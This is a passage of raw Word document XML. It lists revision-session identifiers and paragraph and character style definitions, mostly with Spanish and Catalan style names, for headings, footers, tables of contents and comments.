    <w:rsid w:val="004C5DDC"/>
    <w:rsid w:val="004D234E"/>
    <w:rsid w:val="004D52A1"/>
    <w:rsid w:val="004D5FCC"/>
    <w:rsid w:val="004E71C8"/>
    <w:rsid w:val="004F35EE"/>
    <w:rsid w:val="004F7594"/>
    <w:rsid w:val="005005EC"/>
    <w:rsid w:val="00501A15"/>
    <w:rsid w:val="00501C7A"/>
    <w:rsid w:val="00503C1D"/>
    <w:rsid w:val="005065C6"/>
    <w:rsid w:val="00520AAC"/>
    <w:rsid w:val="00524D74"/>
    <w:rsid w:val="00527111"/>
    <w:rsid w:val="00532796"/>
    <w:rsid w:val="0053404D"/>
    <w:rsid w:val="00542C58"/>
    <w:rsid w:val="00555249"/>
    <w:rsid w:val="00556306"/>
    <w:rsid w:val="005579DA"/>
    <w:rsid w:val="00562105"/>
    <w:rsid w:val="00565C5B"/>
    <w:rsid w:val="005670E5"/>
    <w:rsid w:val="00571AFA"/>
    <w:rsid w:val="005733C4"/>
    <w:rsid w:val="0058388E"/>
    <w:rsid w:val="00585552"/>
    <w:rsid w:val="00591474"/>
    <w:rsid w:val="005A023B"/>
    <w:rsid w:val="005A16DE"/>
    <w:rsid w:val="005A186E"/>
    <w:rsid w:val="005D0BE7"/>
    <w:rsid w:val="005D2242"/>
    <w:rsid w:val="005E7F53"/>
    <w:rsid w:val="005F4506"/>
    <w:rsid w:val="005F4553"/>
    <w:rsid w:val="005F4AC5"/>
    <w:rsid w:val="005F4CA6"/>
    <w:rsid w:val="005F5944"/>
    <w:rsid w:val="005F6EDE"/>
    <w:rsid w:val="006050E1"/>
    <w:rsid w:val="0060603A"/>
    <w:rsid w:val="00606FAB"/>
    <w:rsid w:val="00614982"/>
    <w:rsid w:val="00617D2D"/>
    <w:rsid w:val="00625952"/>
    <w:rsid w:val="00627F60"/>
    <w:rsid w:val="00633007"/>
    <w:rsid w:val="00635AC0"/>
    <w:rsid w:val="006416DF"/>
    <w:rsid w:val="0064792E"/>
    <w:rsid w:val="00650633"/>
    <w:rsid w:val="00653CA3"/>
    <w:rsid w:val="006551AD"/>
    <w:rsid w:val="00655295"/>
    <w:rsid w:val="006635A5"/>
    <w:rsid w:val="00664240"/>
    <w:rsid w:val="00674C49"/>
    <w:rsid w:val="00675849"/>
    <w:rsid w:val="00676DAF"/>
    <w:rsid w:val="00681799"/>
    <w:rsid w:val="006931A4"/>
    <w:rsid w:val="00696354"/>
    <w:rsid w:val="006A2A95"/>
    <w:rsid w:val="006A4AEC"/>
    <w:rsid w:val="006B2234"/>
    <w:rsid w:val="006C573F"/>
    <w:rsid w:val="006D6885"/>
    <w:rsid w:val="006E1BCB"/>
    <w:rsid w:val="006E237C"/>
    <w:rsid w:val="006E46DC"/>
    <w:rsid w:val="006F21A3"/>
    <w:rsid w:val="00705474"/>
    <w:rsid w:val="007069C6"/>
    <w:rsid w:val="00706C6D"/>
    <w:rsid w:val="007306FD"/>
    <w:rsid w:val="00732AEE"/>
    <w:rsid w:val="00735F34"/>
    <w:rsid w:val="007379CA"/>
    <w:rsid w:val="007471D6"/>
    <w:rsid w:val="00750D2B"/>
    <w:rsid w:val="007526BD"/>
    <w:rsid w:val="00753234"/>
    <w:rsid w:val="007536BF"/>
    <w:rsid w:val="00754B4D"/>
    <w:rsid w:val="00756E4A"/>
    <w:rsid w:val="00757B9C"/>
    <w:rsid w:val="007604D5"/>
    <w:rsid w:val="00763EFB"/>
    <w:rsid w:val="00764558"/>
    <w:rsid w:val="00770274"/>
    <w:rsid w:val="00785511"/>
    <w:rsid w:val="00790831"/>
    <w:rsid w:val="007909C5"/>
    <w:rsid w:val="00791888"/>
    <w:rsid w:val="00794CC6"/>
    <w:rsid w:val="0079792F"/>
    <w:rsid w:val="007A4E95"/>
    <w:rsid w:val="007A69B3"/>
    <w:rsid w:val="007B0606"/>
    <w:rsid w:val="007B11B9"/>
    <w:rsid w:val="007B14FB"/>
    <w:rsid w:val="007B1887"/>
    <w:rsid w:val="007B212C"/>
    <w:rsid w:val="007B516F"/>
    <w:rsid w:val="007C1187"/>
    <w:rsid w:val="007C1D5B"/>
    <w:rsid w:val="007E10C5"/>
    <w:rsid w:val="007E3822"/>
    <w:rsid w:val="007E5C88"/>
    <w:rsid w:val="007E5E0A"/>
    <w:rsid w:val="00810E29"/>
    <w:rsid w:val="00814702"/>
    <w:rsid w:val="0081529B"/>
    <w:rsid w:val="008235EF"/>
    <w:rsid w:val="00831684"/>
    <w:rsid w:val="00831B26"/>
    <w:rsid w:val="008330C1"/>
    <w:rsid w:val="00840605"/>
    <w:rsid w:val="008417CC"/>
    <w:rsid w:val="0084399F"/>
    <w:rsid w:val="00847544"/>
    <w:rsid w:val="00856275"/>
    <w:rsid w:val="008578D0"/>
    <w:rsid w:val="00857943"/>
    <w:rsid w:val="00862E9E"/>
    <w:rsid w:val="0086632C"/>
    <w:rsid w:val="008750BB"/>
    <w:rsid w:val="00880E66"/>
    <w:rsid w:val="00890F70"/>
    <w:rsid w:val="00892535"/>
    <w:rsid w:val="00894A5D"/>
    <w:rsid w:val="0089535F"/>
    <w:rsid w:val="008A7329"/>
    <w:rsid w:val="008B5FEF"/>
    <w:rsid w:val="008B70DD"/>
    <w:rsid w:val="008C0ABC"/>
    <w:rsid w:val="008C4064"/>
    <w:rsid w:val="008C50CF"/>
    <w:rsid w:val="008D7AFF"/>
    <w:rsid w:val="008F1016"/>
    <w:rsid w:val="009005A9"/>
    <w:rsid w:val="0090249C"/>
    <w:rsid w:val="009145CB"/>
    <w:rsid w:val="00915A6C"/>
    <w:rsid w:val="00915BED"/>
    <w:rsid w:val="00921DC8"/>
    <w:rsid w:val="00927E54"/>
    <w:rsid w:val="00927F0A"/>
    <w:rsid w:val="00932B2D"/>
    <w:rsid w:val="0093378D"/>
    <w:rsid w:val="00933CF8"/>
    <w:rsid w:val="009353C1"/>
    <w:rsid w:val="00941895"/>
    <w:rsid w:val="00941CA2"/>
    <w:rsid w:val="009440E4"/>
    <w:rsid w:val="00950CAA"/>
    <w:rsid w:val="00966AEE"/>
    <w:rsid w:val="009712C6"/>
    <w:rsid w:val="00977F9E"/>
    <w:rsid w:val="00980ABC"/>
    <w:rsid w:val="0098259F"/>
    <w:rsid w:val="009864C0"/>
    <w:rsid w:val="0099135C"/>
    <w:rsid w:val="00993D25"/>
    <w:rsid w:val="009940A1"/>
    <w:rsid w:val="0099494B"/>
    <w:rsid w:val="009A067C"/>
    <w:rsid w:val="009A31E7"/>
    <w:rsid w:val="009A6B57"/>
    <w:rsid w:val="009B115D"/>
    <w:rsid w:val="009B1250"/>
    <w:rsid w:val="009B2834"/>
    <w:rsid w:val="009B2BA4"/>
    <w:rsid w:val="009B3CB0"/>
    <w:rsid w:val="009B4E6A"/>
    <w:rsid w:val="009B7401"/>
    <w:rsid w:val="009C4D34"/>
    <w:rsid w:val="009C5614"/>
    <w:rsid w:val="009D1689"/>
    <w:rsid w:val="009D61FD"/>
    <w:rsid w:val="009E264A"/>
    <w:rsid w:val="009E6F4C"/>
    <w:rsid w:val="009E7AEF"/>
    <w:rsid w:val="009F0CF5"/>
    <w:rsid w:val="009F1268"/>
    <w:rsid w:val="009F13A7"/>
    <w:rsid w:val="009F5EF9"/>
    <w:rsid w:val="009F6921"/>
    <w:rsid w:val="00A00204"/>
    <w:rsid w:val="00A07E55"/>
    <w:rsid w:val="00A208F1"/>
    <w:rsid w:val="00A25556"/>
    <w:rsid w:val="00A27876"/>
    <w:rsid w:val="00A34E9E"/>
    <w:rsid w:val="00A37295"/>
    <w:rsid w:val="00A45771"/>
    <w:rsid w:val="00A54058"/>
    <w:rsid w:val="00A54B94"/>
    <w:rsid w:val="00A5627C"/>
    <w:rsid w:val="00A56BF2"/>
    <w:rsid w:val="00A603CF"/>
    <w:rsid w:val="00A62A17"/>
    <w:rsid w:val="00A703AB"/>
    <w:rsid w:val="00A80E1B"/>
    <w:rsid w:val="00A85443"/>
    <w:rsid w:val="00A8568F"/>
    <w:rsid w:val="00A900DF"/>
    <w:rsid w:val="00A91810"/>
    <w:rsid w:val="00A91EB8"/>
    <w:rsid w:val="00A93567"/>
    <w:rsid w:val="00AA0003"/>
    <w:rsid w:val="00AA2351"/>
    <w:rsid w:val="00AA647B"/>
    <w:rsid w:val="00AA7FAD"/>
    <w:rsid w:val="00AB038E"/>
    <w:rsid w:val="00AC2DB5"/>
    <w:rsid w:val="00AD31E6"/>
    <w:rsid w:val="00AD4A46"/>
    <w:rsid w:val="00AF0557"/>
    <w:rsid w:val="00AF0A8A"/>
    <w:rsid w:val="00AF2B15"/>
    <w:rsid w:val="00B053EE"/>
    <w:rsid w:val="00B13892"/>
    <w:rsid w:val="00B144D2"/>
    <w:rsid w:val="00B20FD9"/>
    <w:rsid w:val="00B331E9"/>
    <w:rsid w:val="00B348AF"/>
    <w:rsid w:val="00B34A1E"/>
    <w:rsid w:val="00B34E81"/>
    <w:rsid w:val="00B351DC"/>
    <w:rsid w:val="00B432EF"/>
    <w:rsid w:val="00B46FBE"/>
    <w:rsid w:val="00B515DF"/>
    <w:rsid w:val="00B547F1"/>
    <w:rsid w:val="00B5632C"/>
    <w:rsid w:val="00B6063D"/>
    <w:rsid w:val="00B651A7"/>
    <w:rsid w:val="00B70C80"/>
    <w:rsid w:val="00B82287"/>
    <w:rsid w:val="00B83DD2"/>
    <w:rsid w:val="00B85480"/>
    <w:rsid w:val="00B9067B"/>
    <w:rsid w:val="00B93CA3"/>
    <w:rsid w:val="00B951D9"/>
    <w:rsid w:val="00B97A1E"/>
    <w:rsid w:val="00BB27B6"/>
    <w:rsid w:val="00BB381F"/>
    <w:rsid w:val="00BB78C7"/>
    <w:rsid w:val="00BC275B"/>
    <w:rsid w:val="00BC33A1"/>
    <w:rsid w:val="00BC6721"/>
    <w:rsid w:val="00BD1378"/>
    <w:rsid w:val="00BD19C8"/>
    <w:rsid w:val="00BD1B49"/>
    <w:rsid w:val="00BD49D1"/>
    <w:rsid w:val="00BD5919"/>
    <w:rsid w:val="00BF1177"/>
    <w:rsid w:val="00BF6EEB"/>
    <w:rsid w:val="00C0394C"/>
    <w:rsid w:val="00C04AFA"/>
    <w:rsid w:val="00C054D3"/>
    <w:rsid w:val="00C06889"/>
    <w:rsid w:val="00C0798C"/>
    <w:rsid w:val="00C1721B"/>
    <w:rsid w:val="00C356F1"/>
    <w:rsid w:val="00C40F56"/>
    <w:rsid w:val="00C4186B"/>
    <w:rsid w:val="00C4245F"/>
    <w:rsid w:val="00C43B18"/>
    <w:rsid w:val="00C5406C"/>
    <w:rsid w:val="00C60674"/>
    <w:rsid w:val="00C62DA9"/>
    <w:rsid w:val="00C723F2"/>
    <w:rsid w:val="00C86658"/>
    <w:rsid w:val="00C944E6"/>
    <w:rsid w:val="00C9479C"/>
    <w:rsid w:val="00C9562B"/>
    <w:rsid w:val="00CA2DBC"/>
    <w:rsid w:val="00CA75A6"/>
    <w:rsid w:val="00CB53C1"/>
    <w:rsid w:val="00CB6E36"/>
    <w:rsid w:val="00CC13F8"/>
    <w:rsid w:val="00CC7600"/>
    <w:rsid w:val="00CD1106"/>
    <w:rsid w:val="00CD44B8"/>
    <w:rsid w:val="00CD4A00"/>
    <w:rsid w:val="00CE15AE"/>
    <w:rsid w:val="00CE1C05"/>
    <w:rsid w:val="00CF2570"/>
    <w:rsid w:val="00CF5038"/>
    <w:rsid w:val="00D00A85"/>
    <w:rsid w:val="00D0289C"/>
    <w:rsid w:val="00D073CD"/>
    <w:rsid w:val="00D16863"/>
    <w:rsid w:val="00D1787D"/>
    <w:rsid w:val="00D30AE3"/>
    <w:rsid w:val="00D35B5E"/>
    <w:rsid w:val="00D35DDC"/>
    <w:rsid w:val="00D40650"/>
    <w:rsid w:val="00D41EF4"/>
    <w:rsid w:val="00D444D2"/>
    <w:rsid w:val="00D457DA"/>
    <w:rsid w:val="00D504A6"/>
    <w:rsid w:val="00D52A79"/>
    <w:rsid w:val="00D53EEF"/>
    <w:rsid w:val="00D54AC2"/>
    <w:rsid w:val="00D63F6D"/>
    <w:rsid w:val="00D66A10"/>
    <w:rsid w:val="00D73AAA"/>
    <w:rsid w:val="00D74778"/>
    <w:rsid w:val="00D75018"/>
    <w:rsid w:val="00D81BE4"/>
    <w:rsid w:val="00D8346B"/>
    <w:rsid w:val="00D86E03"/>
    <w:rsid w:val="00D87C09"/>
    <w:rsid w:val="00D90949"/>
    <w:rsid w:val="00D924F1"/>
    <w:rsid w:val="00D94062"/>
    <w:rsid w:val="00D94DAA"/>
    <w:rsid w:val="00DA1FF3"/>
    <w:rsid w:val="00DA20D3"/>
    <w:rsid w:val="00DA62E7"/>
    <w:rsid w:val="00DB5F26"/>
    <w:rsid w:val="00DC4235"/>
    <w:rsid w:val="00DD0717"/>
    <w:rsid w:val="00DD4F6C"/>
    <w:rsid w:val="00DD6454"/>
    <w:rsid w:val="00DE1836"/>
    <w:rsid w:val="00DE5C26"/>
    <w:rsid w:val="00DF0920"/>
    <w:rsid w:val="00DF5EA7"/>
    <w:rsid w:val="00E0218D"/>
    <w:rsid w:val="00E07878"/>
    <w:rsid w:val="00E14D38"/>
    <w:rsid w:val="00E15DB8"/>
    <w:rsid w:val="00E162EE"/>
    <w:rsid w:val="00E16AE3"/>
    <w:rsid w:val="00E23AAF"/>
    <w:rsid w:val="00E23DB4"/>
    <w:rsid w:val="00E331EC"/>
    <w:rsid w:val="00E35D11"/>
    <w:rsid w:val="00E44628"/>
    <w:rsid w:val="00E44B9C"/>
    <w:rsid w:val="00E62E6E"/>
    <w:rsid w:val="00E64C85"/>
    <w:rsid w:val="00E67D92"/>
    <w:rsid w:val="00E70FAA"/>
    <w:rsid w:val="00E740A3"/>
    <w:rsid w:val="00E76327"/>
    <w:rsid w:val="00E82E18"/>
    <w:rsid w:val="00E841F1"/>
    <w:rsid w:val="00E91158"/>
    <w:rsid w:val="00E919E6"/>
    <w:rsid w:val="00E9267A"/>
    <w:rsid w:val="00E94E67"/>
    <w:rsid w:val="00EA137B"/>
    <w:rsid w:val="00EA2BD9"/>
    <w:rsid w:val="00EA5045"/>
    <w:rsid w:val="00EB708D"/>
    <w:rsid w:val="00EC122B"/>
    <w:rsid w:val="00EC4C11"/>
    <w:rsid w:val="00ED25F1"/>
    <w:rsid w:val="00EE7CE6"/>
    <w:rsid w:val="00EE7DF8"/>
    <w:rsid w:val="00EF18DE"/>
    <w:rsid w:val="00EF1EA4"/>
    <w:rsid w:val="00F01FF5"/>
    <w:rsid w:val="00F11F27"/>
    <w:rsid w:val="00F149F6"/>
    <w:rsid w:val="00F16B40"/>
    <w:rsid w:val="00F20E91"/>
    <w:rsid w:val="00F21A91"/>
    <w:rsid w:val="00F305FF"/>
    <w:rsid w:val="00F43836"/>
    <w:rsid w:val="00F466F2"/>
    <w:rsid w:val="00F64306"/>
    <w:rsid w:val="00F674A8"/>
    <w:rsid w:val="00F7567F"/>
    <w:rsid w:val="00F75BC4"/>
    <w:rsid w:val="00F84817"/>
    <w:rsid w:val="00F93CE6"/>
    <w:rsid w:val="00F93FA3"/>
    <w:rsid w:val="00F96BEB"/>
    <w:rsid w:val="00FA1220"/>
    <w:rsid w:val="00FA1F5D"/>
    <w:rsid w:val="00FA2475"/>
    <w:rsid w:val="00FA6FD1"/>
    <w:rsid w:val="00FA774B"/>
    <w:rsid w:val="00FB06D2"/>
    <w:rsid w:val="00FB12A0"/>
    <w:rsid w:val="00FB2DF2"/>
    <w:rsid w:val="00FB41B7"/>
    <w:rsid w:val="00FB5990"/>
    <w:rsid w:val="00FC5103"/>
    <w:rsid w:val="00FD4B39"/>
    <w:rsid w:val="00FE40D2"/>
    <w:rsid w:val="00FE5B69"/>
    <w:rsid w:val="00FF4835"/>
    <w:rsid w:val="00FF53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F5C3F2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{02FA67F2-277C-4AC6-9E49-3FE64162E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index 2" w:uiPriority="99"/>
    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
    <w:lsdException w:name="footer" w:uiPriority="99"/>
    <w:lsdException w:name="index heading"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D01C0"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Car"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo2Car"/>
    <w:qFormat/>
    <w:rsid w:val="00F149F6"/>
    <w:pPr>
      <w:keepNext/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo4Car"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0084754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C06889"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLconformatoprevio">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLconformatoprevioCar"/>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eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fnt112">
    <w:name w:val="fnt112"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00467708"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Encabezado">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00E0218D"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00E0218D"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4252"/>
        <w:tab w:val="right" w:pos="8504"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Nmerodepgina">
    <w:name w:val="page number"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00E0218D"/>
  </w:style>
  <w:style w:type="table" w:styleId="Tablaconcuadrcula">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Tabla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DD0717"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="480"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8495"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007A4E95"/>
    <w:pPr>
      <w:ind w:left="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00D75018"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="MS Mincho" w:hAnsi="Times New Roman"/>
      <w:lang w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:rsid w:val="00524D74"/>
    <w:pPr>
      <w:ind w:left="1600"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textodeglobo">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rsid w:val="00E91158"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PiedepginaCar">
    <w:name w:val="Pie de página Car"/>
    <w:link w:val="Piedepgina"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006931A4"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ca-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Refdecomentario">
    <w:name w:val="annotation reference"/>
    <w:rsid w:val="007604D5"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textocomentario">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextocomentarioCar"/>
    <w:rsid w:val="007604D5"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextocomentarioCar">
    <w:name w:val="Texto comentario Car"/>
    <w:link w:val="Textocomentario"/>
    <w:rsid w:val="007604D5"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Asuntodelcomentario">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="Textocomentario"/>
    <w:next w:val="Textocomentario"/>
    <w:link w:val="AsuntodelcomentarioCar"/>
    <w:rsid w:val="007604D5"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AsuntodelcomentarioCar">
    <w:name w:val="Asunto del comentario Car"/>
    <w:link w:val="Asuntodelcomentario"/>
    <w:rsid w:val="007604D5"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Descripcin">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="007B14FB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Tabladeilustraciones">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00706C6D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="HTMLconformatoprevio1">
    <w:name w:val="HTML con formato previo1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00344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left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="MS Mincho" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="es-ES_tradnl" w:eastAsia="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLconformatoprevioCar">
    <w:name w:val="HTML con formato previo Car"/>
    <w:link w:val="HTMLconformatoprevio"/>
    <w:rsid w:val="003446CE"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="MS Mincho" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="24"/>
      <w:lang w:val="es-ES" w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00403CFF"/>
    <w:pPr>
      <w:ind w:left="708"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo1Car">
    <w:name w:val="Título 1 Car"/>
    <w:link w:val="Ttulo1"/>
    <w:rsid w:val="00403CFF"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00490E1A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Ttulo3">
    <w:name w:val="Título3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo3Car"/>
    <w:qFormat/>
    <w:rsid w:val="00B83DD2"/>
    <w:rPr>
      <w:rFonts w:cs="Arial"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="23"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo3Car">
    <w:name w:val="Título3 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo3"/>
    <w:rsid w:val="00B83DD2"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="23"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TtuloTDC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Ttulo1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B83DD2"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:rsid w:val="00B83DD2"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00A900DF"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculovisitado">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:rsid w:val="00E162EE"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo4Car">
    <w:name w:val="Título 4 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo4"/>
    <w:semiHidden/>
    <w:rsid w:val="00847544"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="ca-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo2Car">
    <w:name w:val="Título 2 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
